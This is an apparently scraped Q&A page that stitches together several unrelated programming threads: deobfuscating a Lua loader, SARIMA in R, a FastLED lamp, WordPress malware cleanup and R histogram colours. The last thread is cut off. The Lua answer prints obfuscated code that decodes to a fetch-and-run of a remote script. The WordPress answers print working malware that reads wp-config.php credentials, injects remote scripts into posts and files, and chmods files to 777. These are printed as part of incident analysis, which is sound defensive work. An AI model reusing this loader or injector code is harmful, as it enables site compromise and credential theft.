Develop Reference

How to Decrypt Lua Script [duplicate]

How can I decrypt this new Lua encryption method?
key=[[BREW STORE]];dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx='om jangan decrypt aku :((';awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii='Obfuscator Ini Milik ZiGB';jknofzqxfwhpgpwunwnntdqilsqedpbwajyxnzgqchnbspvvehqoyvqdsavrovwklpgfbzpyiorpggadtdjbworigkbdnkbsspfsobalqavigtcfwehcreyeftezpkdi='Kamu Nyari Load?';rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu='Saya Tak Ragu Ingin Nembak Gay People';yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn="Soeharto is first indonesian president. Jokowi is seventh indonesian's president, Itadori Yuuji is one of main character in Jujutsu Kaisen Anime, Kento Nanami is Side Character On Jujutsu Kaisen Anime. Lava is 1 of the most dangerous liquid in the world (cap)";mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju={ 1,160,3,187,236,277,257,244,160,185,307,173,170,186,170,164,168,168,280,246,160,160,160,160,160,160,160,160,160,160,160,200,279,224,161,392,224,227,218,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,271,258,262,277,275,259,257,276,261,260,252,261,270,259,206,268,277,257,293,296,160,160,215,161,337,171,160,160,160,299,160,160,161,171,161,160,162,174,161,162,163,299,161,160,164,302,161,163,165,179,162,160,320,242,160,160,160,289,290,213,288,161,163,215,288,289,163,208,288,161,292,209,288,289,292,179,288,161,293,216,288,289,165,210,288,161,166,216,288,289,166,218,288,161,167,210,288,289,167,217,288,161,296,217,288,289,296,175,288,161,297,179,288,289,297,176,288,161,170,195,288,289,170,194,288,161,299,201,288,289,299,176,288,161,300,181,288,289,300,175,288,161,301,176,288,289,301,211,288,161,302,217,288,289,302,217,288,161,303,215,288,289,175,217,288,161,304,188,288,289,176,183,288,161,177,183,288,289,177,211,288,161,178,212,288,289,178,217,288,161,307,217,288,289,307,182,288,161,180,211,288,289,180,212,288,161,309,217,288,289,309,211,288,161,182,218,288,289,310,208,288,161,183,218,288,289,183,217,288,161,184,210,288,289,312,216,288,161,185,209,288,289,185,215,288,161,314,214,288,289,314,217,288,161,187,210,288,238,162,210,160,289,290,214,288,161,291,217,288,289,291,182,288,161,164,209,288,289,164,215,288,161,165,214,288,289,165,183,288,161,294,208,288,289,294,216,288,161,167,210,288,289,167,219,288,161,296,209,288,289,168,210,288,161,297,216,288,289,169,217,288,161,170,183,288,289,170,210,288,161,171,188,288,289,171,209,288,161,300,186,288,289,172,208,288,161,301,209,288,289,301,187,288,161,302,186,288,289,174,208,288,161,303,209,288,289,175,184,288,161,304,185,288,289,304,187,288,161,177,208,288,289,177,185,288,161,306,208,288,289,178,210,288,161,307,186,288,289,179,188,288,161,180,208,288,289,180,208,288,161,309,208,288,289,181,184,288,161,310,210,288,289,182,185,288,161,311,209,288,289,183,186,288,161,184,210,288,289,184,208,288,161,185,210,288,289,185,209,288,161,186,188,288,289,186,183,288,161,315,216,288,238,162,210,210,289,162,208,288,161,163,219,288,289,163,183,288,161,164,210,288,289,292,184,288,161,293,183,288,289,165,184,288,161,294,185,288,289,294,187,288,161,295,186,288,289,295,187,288,161,168,187,288,289,168,186,288,161,169,185,288,289,297,185,288,161,170,186,288,289,298,209,288,161,171,185,288,289,299,185,288,161,172,186,288,289,300,186,288,161,301,185,288,289,301,184,288,161,302,210,288,289,174,185,288,161,303,185,288,289,175,186,288,161,304,209,288,289,176,187,288,161,305,184,288,289,177,209,288,161,306,210,288,289,306,184,288,161,307,185,288,289,307,185,288,161,308,187,288,289,308,183,288,161,309,184,288,289,181,188,288,161,310,185,288,289,182,187,288,161,311,184,288,289,183,185,288,161,184,183,288,289,312,193,288,161,313,194,288,289,313,208,288,161,314,216,288,289,186,210,288,161,187,219,288,238,162,210,260,289,290,182,288,161,291,213,288,289,163,218,288,161,164,208,288,289,292,176,288,161,165,180,288,289,165,180,288,161,294,175,288,289,294,179,288,161,167,180,288,238,162,170,310,356,161,162,160,228,161,160,160,356,160,160,160,228,160,160,161,231,160,161,160,294,164,294,272,259,257,268,268,164,293,268,271,257,260,164,295,275,276,274,265,270,263,164,293,259,264,257,274,164,294,276,257,258,268,261,164,295,277,270,272,257,259,267,289,160,160,160,288,161,337,162,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,288,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,161,289,409,295,288,289,293,255,229,238,246};local nau = 'load'; function krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(...) local nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm='';for hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb=1, #mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju do if hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb>3 then nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm=nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm.._ENV['\115\116\114\105\110\103']['\99\104\97\114']((mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb]-mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[2]));end end;local tolan = 'loadstring';_ENV[_ENV['\115\116\114\105\110\103']['\99\104\97\114'](awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii:lower():sub(18,18):byte(),dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx:lower():sub(1,1):byte(),rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu:lower():sub(-9,-9):byte(),yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn:lower():sub(21,21):byte())](nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm)(); end;krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju);
I tried many methods. But I don't think I'm experienced enough. The result was negative.

Add proper linebreaks
Replace insane variable names with shorter ones
Unescape things like '\115\116\114\105\110\103' into 'string'
Keep going until you realize the thing that starts with _ENV[_ENV[ ends up becoming just load (by the way, nau and tolan are unused decoys)
Notice that it's a very simple decryption function that operates on the giant table of numbers and then loads the result
Modify the decryption function to print the result instead of loading it
Notice the result of doing so is Lua 5.4 bytecode
Run unluac on said bytecode
If you're following along, you'll have gotten this out of unluac (newlines elided for brevity):
pcall(load(string.char(table.unpack({ 108, 111, 97, 100, 40, 114, 101, 113, 117, 101, 115, 116, 32, 40, 34, 71, 69, 84, 34, 44, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 98, 114, 101, 119, 100, 101, 114, 115, 47, 101, 57, 99, 54, 97, 100, 56, 54, 97, 100, 49, 52, 56, 97, 51, 98, 101, 54, 57, 97, 97, 98, 49, 102, 51, 100, 53, 101, 97, 101, 99, 57, 47, 114, 97, 119, 47, 101, 50, 48, 49, 52, 56, 54, 56, 55, 53, 51, 52, 53, 100, 51, 52, 53, 54, 52, 50, 102, 51, 52, 53, 100, 55, 50, 99, 102, 50, 52, 52, 56, 48, 50, 57, 52, 55, 50, 51, 47, 68, 70, 98, 114, 101, 119, 46, 108, 117, 97, 34, 41, 41, 32, 40, 41}))))
Now reverse the string.char and table.unpack to see what it's really doing:
load(request ("GET", "https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua")) ()
So https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua (prettier at https://gist.github.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9#file-dfbrew-lua) has what it's really doing, and it's finally not obfuscated at all. (The sha256 was 7de86710d2e66b6ef3b7e1a772d8d80c550b7a309925320e3296ffd333988e6d at the time of writing this answer; some archives/mirrors: 1 2 3 4)
And if you're wondering how this obfuscation happened, this string is present in the bytecode, which should give you a hint: C:\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\obfuscated\enc.lua

How to identify parameters for SARIMA model in R

Part 2 Boston
plot(boston, ylab=" Boston crime data", xlab= "Time")
#Time series seem to have homogeneous variance upon visual inspection
#Q2
#Trend looks linear in the plot, so for trend differencing operator take d=1
newboston= as.numeric(unlist(boston))
xdiff = diff(newboston)
plot(xdiff)
#Q3
#ADF
library(tseries)
adf.test(xdiff)
#From the result, alternative hypothesis is stationary so null hypothesis is rejected
#KPSS test
install.packages('fpp3', dependencies = TRUE)
library ( fpp3 )
unitroot_kpss(xdiff)
#the p-value is >0.05, so fail to reject null hypothesis for KPSS
#Q4
library(astsa)
acf2(xdiff, max.lag = 50)
model1 = sarima(xdiff, p, 1, q)
So this is what I have tried so far. I am quite new to R and so do be kind if my workings make little sense. For context, Boston is the data I imported from an excel, that is simply a column of x axis data.
Firstly, I am trying to do Q4, but I am not sure how I would go about to find p and q.
Second, I am unsure whether what I did in Q2 to detrend my data is correct in the first place.
Here is the output of dput(boston)
dput(boston)
structure(list(x = c(41, 39, 50, 40, 43, 38, 44, 35, 39, 35,
29, 49, 50, 59, 63, 32, 39, 47, 53, 60, 57, 52, 70, 90, 74, 62,
55, 84, 94, 70, 108, 139, 120, 97, 126, 149, 158, 124, 140, 109,
114, 77, 120, 133, 110, 92, 97, 78, 99, 107, 112, 90, 98, 125,
155, 190, 236, 189, 174, 178, 136, 161, 171, 149, 184, 155, 276,
224, 213, 279, 268, 287, 238, 213, 257, 293, 212, 246, 353, 339,
308, 247, 257, 322, 298, 273, 312, 249, 286, 279, 309, 401, 309,
328, 353, 354, 327, 324, 285, 243, 241, 287, 355, 460, 364, 487,
452, 391, 500, 451, 375, 372, 302, 316, 398, 394, 431, 431),
y = c(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75,
76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104,
105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116,
117, 118)), class = c("tbl_df", "tbl", "data.frame"), row.names = c(NA,
-118L))

FastLed Matrix with nonlinear led array

I built this LED lamp project where i put 126 ping pong balls with ws2812B leds inside, into a glass vase.
I had no previous knowledge of fastled prior to this.
The balls are all jumbled up and leds are in no apparent sequence any longer.
In the code I created a 3d array where I assigned each led a position in the matrix by taping a grid on the outside of the vase and selecting each led with a built in potentiometer and reading the led number from the serial monitor.
so I now have this 3d array
int led_zyx[3][7][13] =
{
{ {92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92},
{92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92},
{78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78},
{65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65},
{40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40},
{24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24},
{1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1}
},
{
{124, 124, 124, 124, 110, 119, 119, 116, 116, 108, 108, 108, 117},
{92, 89, 89, 107, 104, 104, 110, 116, 105, 108, 108, 106, 106},
{85, 84, 84, 77, 98, 82, 97, 97, 75, 92, 91, 85, 85},
{34, 73, 73, 60, 60, 82, 65, 65, 45, 62, 72, 34, 34},
{38, 32, 50, 46, 47, 40, 51, 40, 29, 29, 38, 38, 38},
{0, 17, 17, 46, 25, 25, 31, 31, 10, 29, 23, 23, 23},
{2, 2, 0, 0, 0, 1, 1, 0, 0, 10, 2, 2, 2}
},
{
{113, 118, 114, 109, 125, 115, 121, 120, 120, 123, 112, 112, 117},
{95, 89, 103, 83, 83, 99, 100, 122, 111, 101, 96, 106, 102},
{84, 94, 81, 80, 83, 88, 79, 70, 87, 86, 96, 90, 93},
{74, 67, 55, 68, 76, 56, 69, 57, 61, 71, 58, 63, 74},
{54, 49, 26, 37, 42, 41, 36, 43, 52, 44, 33, 59, 66},
{18, 19, 13, 20, 25, 25, 21, 30, 22, 35, 39, 33, 27},
{14, 8, 3, 9, 4, 4, 12, 16, 5, 11, 15, 28, 7}
},
};
So i already managed to create of all kinds of cool modes like that - except of using the outside of the lamp/vase as an XY matrix to draw animations on it. It would be a comfortable 13x7 pixels to play around with, but I cant quite figure out how to address it properly to display graphics, or text or pixel animations.
Could anyone give me a pointer how to approach this?
I looked into XYmatris and smartmatrix, but they require the leds to be layed out in a specific order - not in that random way mine are set up.
Thank you for your help

How to remove virus from WordPress?

How to remove virus from WordPress?
<script type="text/javascript" async="" src="https://examhome.net/stat.js?v=1.0.2"></script>

I had the same issue on two of my pages this morning and after investigate a lot in my files and DB, I found what the malware did was change my js files adding an encoded script and adding another script at the end of each post on the wp_posts table on my DB.
I solved the problem with basically two steps:
First: go to your DB (Mysql) with PHPMyadmin or with any client and type:
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
what it does is delete all the occurrences of the malware injection on your table.
Note: the "?ver=1.0.5" part of the search can change, check your page code with "Ctrl+U" when it starts to load and before the redirect, search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode..." and check the source and version of the malware js in order to change it on the db query above.
Second: go to your file manager and compress all your files in a zip or similar. download the compressed file and extract on your computer, use Notepad++ (sublimetext and others can help, but i recommend Notepad++) and use the advanced search on that directory to replace this in all documents for empty or a blankspace:
this is an image of how the replacement looks on Notepad++ (in Spanish)
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
this is an image of how the replacement looks on Notepad++ (in Spanish)
Note: the numbers inside can change, but they always start with eval(String.fromCharCode(, and don't worry, none of the core js of wordpress or plugin uses this, so you can search any match and copy the numbers inside to complete the replace statement.
then compress it again, delete all your public_html content and reupload the compress file and extract it on the public_html root and is done.
With this everything returned to the normality for my two Wordpress pages, Hope it can Help you. Good luck!

You should check your theme's wp-content/themes/{you-active-theme-name}/functions.php file to see if anything malicious was added.
You can also look at VaulPress offered by the creators of wordpress. Run a scan with it and see what it finds.
https://vaultpress.com/

I helped a friend with this issue and dicided to help a community with the experience i had in order to solve this nasty malware in WordPress files ,I discovered that malware being injected into one of the folders in my case /wp-content/uploads/ folder as a file with no extension .
I discovered two files (php files) :
first file expose the "wp-config.php" with all the keys and DB details and injects the examhome.net script into the post_content table - below is the code .
<?php echo ":#009009#:";
$file_to_search = "wp-config.php";
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);
function search_file($dir,$file_to_search){
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
echo ":#009009#:";
function show_sitenames($file){
$content = #file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {
echo $conn->connect_error;
} else {
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "examhome") === false){
echo "nothing:".$file."\n";
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
$conn->query($q3);
} else {
echo "already exist:".$file."\n";
}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function get_var_reg($pat,$text) {
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
exit();
And the second file when executed is injecting the code below ( js script ) into the js files recursively into the "" section everywhere .
The script also change the permissions of the files to 777 meaning read and write
At this stage your system is already compromised and it doesn't matter how many times you remove the script from the files they have fully access to the system because of the "wp-config.php" details which compromised earlier meaning that they now can access your wp-admin
<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))> -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';
$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
#system("chmod 777 ".$f);
#file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo $f;
}
}
}
echo ":#009009#:";
It's important that you don't use the duplicator plugin as it seems it has a SQL injection hole , if you do have it in your system remove it .
You can use grep command to identify the infected files like this :
sudo grep -rl "examhome.net" /var/www/html/ | more
sudo grep -r "eval(String.fromCharCode(118, 97 " /var/www/html/ | more
and finally using grep and sed command you can identify and replace the infected code with space .
I really hope this could help others to solve this issue it's not a final solution since this malware worm is being updated and i'm still investigating this issue .
Dave
Disclaimer : Use of the information in this post is your responsibility only!

R - hist plot colours by quantile

I am trying to do a simple hist plot and colour the bins by quantile.
I was wondering why when the bins size change the colours gets all messed up.
Maybe I am not doing it right from the beginning.
The quantiles are
quantile(x)
0% 25% 50% 75% 100%
0.00 33.75 58.00 78.25 123.00
Then I am setting the colours with the quantile values
k = ifelse(test = x <= 34, yes = "#8DD3C7",
no = ifelse(test = (x > 34 & x <= 58), yes = "#FFFFB3",
no = ifelse(test = (x > 58 & x <= 79), yes = "#BEBADA",
no = ifelse(test = (x > 79), yes = "#FB8072", 'grey'))) )
Then when I plot with larger bin, I get :
hist(dt, breaks = 10, col = k)
Which seems right, even though the last bin is wrong (?!).
But when I try with smaller bins, the colours are not right.
Could someone help me understand why is it wrong ? Or if my code is wrong ?
The x in question
x = c(23, 23, 16, 16, 34, 34, 43, 43, 97, 97, 63, 63, 39, 39, 29,
29, 63, 63, 48, 48, 7, 7, 80, 80, 69, 69, 110, 110, 103, 103,
43, 43, 39, 39, 46, 46, 14, 14, 56, 56, 76, 76, 52, 52, 18, 18,
32, 32, 66, 66, 70, 70, 26, 26, 40, 40, 105, 105, 62, 62, 51,
51, 58, 58, 37, 37, 55, 55, 42, 42, 11, 11, 89, 89, 55, 55, 109,
109, 49, 49, 27, 27, 96, 96, 27, 27, 65, 65, 74, 74, 17, 17,
